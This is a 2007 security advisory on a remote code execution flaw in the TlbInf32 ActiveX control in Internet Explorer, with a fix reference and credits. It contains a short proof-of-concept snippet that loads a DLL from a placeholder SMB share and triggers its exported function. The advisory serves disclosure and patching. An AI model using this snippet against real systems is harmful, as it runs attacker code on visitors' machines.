TlbInf32 ActiveX Command Execution
========================================================================
= TlbInf32 ActiveX Command Execution
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx
=
= Affected Software:
= Internet Explorer
= tlbInf32.dll
= vstlbinf.dll
=
= Public disclosure on Wednesday August 15, 2007
========================================================================
The TypeLib Information object library , implemented in TlbInf32.dll,
is a set of COM objects designed to make type library browsing
functionality easily accessible to both Visual Basic and C++
programmers.
Although it is not marked as safe for scripting in the registry, it does
implement IObjectSafety.
Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
The TypeLibInfoFromFile() function is used to open a file and retrieve
the
typelib information from it.
TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo
This function will accept a webdav/smb share to a DLL file, allowing the
retrieval of information from a DLL hosted on a remote server.
========================================================================
TlbInf32.chm
Type libraries can contain help information for the library itself
(TypeLibInfo object), each TypeInfo (TypeInfo object), and each member
(MemberInfo object). This information is available in several
different
forms.
HelpString is the documentation string which appears as a short
description of the string in object browsers. If the optional LCID
(Language/Country identifier) is specified, then the returned string
is
localized if possible.
Documentation strings can be stored either in the type library
directly
or retrieved via a call to the DLLGetDocumentation entry point in the
Dll
specified by the HelpStringDll property.
The HelpStringContext is passed to the HelpStringDll to get the
correct
documentation string for the object. The HelpStringDll and
HelpStringContext properties values are used automatically by the
HelpString property.
========================================================================
If the DLL file specified in the call to TypeLibInfoFromFile() has been
modified to direct the HelpStringDll property to a DLL which exports
a malicious DLLGetDocumentation function, then this function will be
executed when a request for the HelpString property is made.
<object width=1000 height=20 classid="CLSID:<CLASSID>"
name=test></object>
x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)
== Solutions ==
Install the vendor supplied patch.
http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx
== Credit ==
Discovered and advised to Microsoft November 23 2006 by Brett Moore of
Security-Assessment.com
As this is my last advisory release before I leave sa.com and head off
into the future, I gotta say thanx to the team there, its been a blast
guys.
All you kiwis overseas have you thought about a trip home.
www.kiwicon.org
+-SoSD-+